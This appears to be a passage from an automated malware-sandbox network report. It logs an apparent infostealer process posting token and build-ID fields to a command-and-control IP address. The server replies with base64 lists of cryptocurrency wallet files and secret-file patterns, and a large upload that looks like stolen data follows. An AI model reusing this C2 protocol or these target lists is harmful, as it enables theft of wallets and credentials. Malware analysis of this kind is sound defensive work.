                                                                              26192.168.2.45268665.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:40 UTC279OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----GIEHJDHCBAEHJJJKKFID
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 1145
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:40 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------GIEHJDHCBAEHJJJKKFIDContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------GIEHJDHCBAEHJJJKKFIDCont
                                                                              2024-05-26 08:23:41 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:41 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              27192.168.2.45268765.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:41 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KEBFHIJECFIDGDGCGHCGCont
                                                                              2024-05-26 08:23:42 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:42 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:42 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              28192.168.2.45268865.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:43 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DAAFBAKECAEGCBFIEGDGCont
                                                                              2024-05-26 08:23:44 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              29192.168.2.45268965.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:45 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IJDGCAEBFIIECAKFHIJE
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 331
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 45 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IJDGCAEBFIIECAKFHIJEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJDGCAEBFIIECAKFHIJECont
                                                                              2024-05-26 08:23:45 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:45 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:45 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                              Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              30192.168.2.45269065.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:46 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----IDAEHCFHJJJJECAAFBKJ
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 453
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:46 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------IDAEHCFHJJJJECAAFBKJContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IDAEHCFHJJJJECAAFBKJCont
                                                                              2024-05-26 08:23:47 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              31192.168.2.45269165.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:48 UTC281OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AFCBAEBAEBFHCAKFCAKE
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 129229
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 41 45 42 41 45 42 46 48 43 41 4b 46 43 41 4b 45 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------AFCBAEBAEBFHCAKFCAKEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AFCBAEBAEBFHCAKFCAKECont
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 48 67 57 4b 78 38 4a 36 56 71 4e 74 4c 4d 39 39 63 76 45 73 38 54 73 70 56 50 4d 58 49 77 41 4d 6a 6e 41 35 4a 36 31 34 6d 4b 6f 34 65 74 57 76 55 62 54 32 2f 43 35 39 6c 67 31 55 77 31 48 6b 70 71 36 33 31 50 55 74 4d 38 61 65 48 74 59 76 30 73 72 44 55 42 4c 63 79 41 6c 55 4d 54 72 6e 41 79 65 57 55 44 6f 44 56 79 39 46 78 46 71 6c 72 64 78 57 6b 74 79 69 51 79 78 4d 73 54 49 47 42 5a 6f 79 44 38 7a 41 59 2b 51 39 36 38 78 30 6a 53 4c 48 51 66 6a 46 5a 36 62 59 53 7a 53 52 77 71 32 35 70 57 42 4f 34 77 73 54 30 41 39 52 58 6f 50 2f 43 53 77 2f 38 41 50 35 6f 6e 2f 67 30 48 2f 77 41 52 58 6c 59 6a 43 71 4d 6c 37 47 37 54 53 65 76 6e 63 39 47 6c 69 4e 48 37 54 52 33 73 63 64 34 74 30 46 6f 6a 4a 71 6c 74 70 6c 78 61 32 2b 63 7a 70 49 30 57 31 53 53 41 43
                                                                              Data Ascii: HgWKx8J6VqNtLM99cvEs8TspVPMXIwAMjnA5J614mKo4etWvUbT2/C59lg1Uw1Hkpq631PUtM8aeHtYv0srDUBLcyAlUMTrnAyeWUDoDVy9FxFqlrdxWktyiQyxMsTIGBZoyD8zAY+Q968x0jSLHQfjFZ6bYSzSRwq25pWBO4wsT0A9RXoP/CSw/8AP5on/g0H/wARXlYjCqMl7G7TSevnc9GliNH7TR3scd4t0FojJqltplxa2+czpI0W1SSAC
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 63 63 6e 74 39 54 56 65 69 75 2b 6c 67 73 4e 52 6c 7a 30 71 63 59 76 75 6b 6b 63 46 58 47 59 6d 72 48 6c 71 56 4a 53 58 5a 74 73 4b 4b 4b 4b 36 54 6d 43 6b 70 61 53 67 41 72 75 50 68 2f 65 57 74 70 44 71 48 32 6d 35 68 68 33 4e 48 74 38 32 51 4c 6e 47 37 4f 4d 31 77 39 46 63 32 4c 77 2f 77 42 59 70 2b 7a 76 59 37 63 42 69 2f 71 6c 62 32 74 72 2f 67 65 31 2f 77 42 73 61 5a 2f 30 45 72 50 2f 41 4d 43 45 2f 77 41 61 54 2b 32 64 4c 2f 36 43 64 6c 2f 34 45 4a 2f 6a 58 69 74 46 65 58 2f 59 6e 2f 54 7a 38 50 38 41 67 6e 75 66 36 79 66 39 4f 76 38 41 79 62 2f 67 48 74 50 39 73 36 56 2f 30 46 4c 4c 2f 77 41 43 45 2f 78 72 7a 48 78 64 50 44 63 2b 4a 37 75 57 43 56 4a 59 32 43 59 65 4e 67 77 50 79 4b 4f 6f 72 45 6f 72 70 77 6d 57 66 56 36 6e 74 4f 61 2f 79 2f 34 4a
                                                                              Data Ascii: ccnt9TVeiu+lgsNRlz0qcYvukkcFXGYmrHlqVJSXZtsKKKK6TmCkpaSgAruPh/eWtpDqH2m5hh3NHt82QLnG7OM1w9Fc2Lw/wBYp+zvY7cBi/qlb2tr/ge1/wBsaZ/0ErP/AMCE/wAaT+2dL/6Cdl/4EJ/jXitFeX/Yn/Tz8P8Agnuf6yf9Ov8Ayb/gHtP9s6V/0FLL/wACE/xrzHxdPDc+J7uWCVJY2CYeNgwPyKOorEorpwmWfV6ntOa/y/4J
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 75 63 30 55 6c 46 41 42 53 30 6c 4c 54 41 4b 44 52 53 55 41 46 46 46 46 4d 59 5a 70 61 53 69 67 51 74 46 47 61 4b 41 44 70 52 52 52 6d 6d 4d 44 52 52 53 47 67 42 61 4b 53 6c 6f 41 4b 4b 4b 4d 30 41 4b 4f 61 4b 51 55 75 61 41 43 67 30 55 55 67 43 69 6b 70 61 42 43 30 6d 4b 50 70 53 6d 6b 41 6d 44 53 34 34 6f 6f 70 67 41 48 74 52 69 69 69 6b 41 6d 4d 30 62 63 55 36 6c 6f 75 77 47 34 70 43 4f 6c 4f 78 78 51 42 6e 69 6c 63 4c 6a 4d 65 68 70 43 6d 52 30 2f 47 72 43 57 38 7a 2f 64 68 6b 50 30 55 31 5a 54 53 4c 78 78 2f 71 64 76 2b 38 77 46 53 36 73 56 75 77 35 72 47 57 59 76 51 31 47 59 6a 36 56 76 44 52 4a 67 50 33 6c 78 43 6e 31 61 6e 6a 53 4c 56 50 38 41 57 58 68 50 2b 34 74 4c 36 31 42 64 52 2b 31 73 63 30 30 5a 4e 4d 4b 6b 66 53 75 74 58 54 74 4c 55 2f 4d
                                                                              Data Ascii: uc0UlFABS0lLTAKDRSUAFFFFMYZpaSigQtFGaKADpRRRmmMDRRSGgBaKSloAKKKM0AKOaKQUuaACg0UUgCikpaBC0mKPpSmkAmDS44oopgAHtRiiikAmM0bcU6louwG4pCOlOxxQBnilcLjMehpCmR0/GrCW8z/dhkP0U1ZTSLxx/qdv+8wFS6sVuw5rGWYvQ1GYj6VvDRJgP3lxCn1anjSLVP8AWXhP+4tL61BdR+1sc00ZNMKkfSutXTtLU/M
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 55 5a 74 32 32 4a 73 48 48 74 54 5a 42 62 74 34 56 62 37 55 45 61 33 46 75 47 66 63 4d 6a 41 41 4f 61 68 75 68 4b 50 42 45 70 6d 7a 35 70 73 6c 4c 35 39 64 67 7a 2b 74 65 6e 53 69 6c 4e 50 7a 73 63 74 65 54 64 4f 53 2f 75 76 38 41 49 38 73 6f 70 63 55 56 39 6d 66 6d 77 47 6b 6f 50 46 4a 51 41 74 64 39 38 4f 76 39 52 71 48 2b 39 48 2f 4a 71 34 47 75 39 2b 48 58 2b 70 31 48 2f 65 6a 2f 41 50 5a 71 38 7a 4e 76 39 32 66 71 6a 32 73 67 2f 77 42 38 58 6f 7a 58 73 74 56 74 64 46 38 43 61 64 66 58 62 37 59 6f 37 47 48 67 64 57 4f 77 59 55 65 35 72 53 30 76 56 62 58 56 39 4d 68 76 37 56 38 77 79 4c 6e 6e 71 70 37 67 2b 34 72 77 7a 57 2f 45 4d 2b 72 32 6d 6e 32 66 4b 57 74 6c 62 78 78 4a 48 6e 37 7a 42 51 43 78 2f 4c 6a 32 71 58 77 39 72 6a 32 4d 4e 35 70 63 30 7a
                                                                              Data Ascii: UZt22JsHHtTZBbt4Vb7UEa3FuGfcMjAAOahuhKPBEpmz5pslL59dgz+tenSilNPzscteTdOS/uv8AI8sopcUV9mfmwGkoPFJQAtd98Ov9RqH+9H/Jq4Gu9+HX+p1H/ej/APZq8zNv92fqj2sg/wB8XozXstVtdF8CadfXb7Yo7GHgdWOwYUe5rS0vVbXV9Mhv7V8wyLnnqp7g+4rwzW/EM+r2mn2fKWtlbxxJHn7zBQCx/Lj2qXw9rj2MN5pc0z
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 55 66 59 37 58 2f 41 4a 39 6f 66 2b 2f 59 72 47 6c 31 36 57 34 38 49 32 4e 37 48 4e 70 46 74 4a 65 57 39 78 4f 39 73 39 70 6d 5a 76 38 41 53 4a 41 4e 6a 69 4a 67 6f 41 41 41 2b 64 63 59 72 59 76 72 79 4f 35 38 55 61 69 74 6a 62 52 4c 44 5a 74 65 57 31 33 62 72 48 38 6b 54 4c 42 49 30 55 67 48 54 44 62 66 77 5a 54 36 69 73 58 6a 73 4b 6f 38 7a 70 72 72 30 58 54 35 48 61 38 75 7a 4c 6d 35 59 34 68 75 31 75 72 36 2f 4d 58 37 48 61 2f 38 2b 30 50 2f 41 48 77 4b 6b 53 4e 49 31 32 78 6f 71 72 36 4b 4d 43 73 75 2f 77 42 54 6b 67 38 4f 71 77 62 54 35 67 64 4d 73 43 73 55 46 75 46 75 4c 65 65 52 45 62 7a 5a 48 4b 6a 4b 4d 41 34 34 5a 2b 57 55 45 43 6e 58 32 70 54 36 64 48 59 58 71 61 66 46 49 31 37 49 73 39 7a 42 49 71 62 49 4e 71 71 78 68 55 63 37 64 34 62 65 4f
                                                                              Data Ascii: UfY7X/AJ9of+/YrGl16W48I2N7HNpFtJeW9xO9s9pmZv8ASJANjiJgoAAA+dcYrYvryO58UaitjbRLDZteW13brH8kTLBI0UgHTDbfwZT6isXjsKo8zprr0XT5Ha8uzLm5Y4hu1ur6/MX7Ha/8+0P/AHwKkSNI12xoqr6KMCsu/wBTkg8OqwbT5gdMsCsUFuFuLeeREbzZHKjKMA44Z+WUECnX2pT6dHYXqafFI17Is9zBIqbINqqxhUc7d4beO
                                                                              2024-05-26 08:23:48 UTC16355OUTData Raw: 6e 39 61 51 77 50 48 4e 49 44 7a 36 69 69 6a 6e 46 4d 59 68 2b 74 48 46 47 4d 55 66 79 6f 47 4a 33 70 4f 4d 55 76 62 2b 64 4a 78 53 41 4f 67 7a 52 31 4a 78 31 37 30 44 72 51 65 31 4d 59 68 36 30 6f 36 34 70 50 38 39 4b 4b 42 6e 6f 6c 46 46 46 5a 6e 79 4a 30 76 67 6a 2f 6b 4e 54 66 39 65 37 66 2b 68 4c 58 61 33 69 4b 59 47 63 6a 35 6c 78 67 2f 6a 58 46 65 43 66 38 41 6b 4d 7a 66 39 65 37 66 2b 68 4c 58 61 58 5a 2f 30 57 54 38 50 35 69 76 7a 37 69 54 2f 66 4a 65 69 50 30 58 68 6e 2f 63 56 36 73 71 49 61 6f 2b 49 2f 38 41 6b 58 72 72 2f 67 48 2f 41 4b 47 4b 74 78 6d 71 66 69 4c 2f 41 4a 46 36 36 2f 34 42 2f 77 43 68 69 76 44 79 7a 2f 66 61 50 2b 4b 50 35 6f 39 6a 4d 2f 38 41 63 71 33 2b 47 58 35 4d 34 43 69 69 69 76 31 30 2f 49 67 6f 6f 6f 6f 41 4b 4b 4b 4b
                                                                              Data Ascii: n9aQwPHNIDz6iijnFMYh+tHFGMUfyoGJ3pOMUvb+dJxSAOgzR1Jx170DrQe1MYh60o64pP89KKBnolFFFZnyJ0vgj/kNTf9e7f+hLXa3iKYGcj5lxg/jXFeCf8AkMzf9e7f+hLXaXZ/0WT8P5ivz7iT/fJeiP0Xhn/cV6sqIao+I/8AkXrr/gH/AKGKtxmqfiL/AJF66/4B/wChivDyz/faP+KP5o9jM/8Acq3+GX5M4Ciiiv10/IgooooAKKKK
                                                                              2024-05-26 08:23:48 UTC14744OUTData Raw: 6f 6f 41 4b 4b 4b 53 67 59 55 55 55 55 41 4a 52 52 52 51 4d 4b 53 67 30 55 41 46 4a 51 61 4b 59 77 70 4b 57 6b 70 41 46 49 61 57 6b 2f 47 6d 4d 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 53 69 69 69 67 59 47 6b 6f 6f 6f 47 68 4b 4b 4b 4b 42 69 47 69 69 69 67 59 6c 46 46 46 41 43 55 68 70 61 44 54 47 4a 51 61 4b 53 67 59 55 6c 4c 53 55 41 46 4a 53 30 6c 41 77 70 4b 4b 4b 42 6f 53 69 69 6b 4e 41 42 52 52 53 55 46 42 52 52 53 47 67 41 70 4b 44 53 55 46 43 30 6c 46 46 4d 41 4e 4e 6f 4e 46 41 77 4e 4a 52 52 51 4d 53 6b 70 61 4b 42 69 55 6c 4b 61 53 67 59 6c 46 46 46 41 78 4b 44 52 33 70 4b 41 43 6b 70 61 53 67 61 43 6b 70 54 53 55 44 45 70 4b 57 6b 6f 47 46 49 61 57 6b 6f 47 42 70 70 70 54 52 51 4d 53 6a 4e 46 42 6f 47 4e 4e 4c 53 55 55 44 43 6b 37 30 74 4a 33 6f 47 49
